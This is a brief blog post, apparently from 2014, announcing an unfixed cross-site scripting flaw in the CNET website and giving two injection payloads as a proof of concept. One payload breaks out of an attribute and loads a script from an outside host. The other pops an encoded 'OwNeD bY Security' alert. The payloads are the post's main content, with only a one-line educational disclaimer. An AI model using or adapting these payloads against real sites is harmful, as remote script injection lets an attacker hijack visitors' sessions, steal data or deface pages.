Tuesday 6 May 2014

XSS in CNET Website Not Fixed [#POC]

Brazilian Security Researcher Found XSS in CNET Website [#POC]

XSS IN CNET Payload are as follows:

Injected payload: "><script src=http://yourjavascript.com/4111219525/sechaha.js></script>

Injected payload 2: 
"><script>alert(String.fromCharCode(35, 79, 119, 78, 101, 68, 32, 98, 89, 32, 83, 101, 99, 117, 114, 105, 116, 121))</script>

Disclaimer: This payload is only education purpose. We are not responsible for any kind of damage.

About The Author:
Erick Andrade, studied at the Federal University GIS Data Android Mobile Development
PHP / SQL,  Analyst in Information Security in Brazil.


Post a Comment

Note: only a member of this blog may post a comment.

Toggle Footer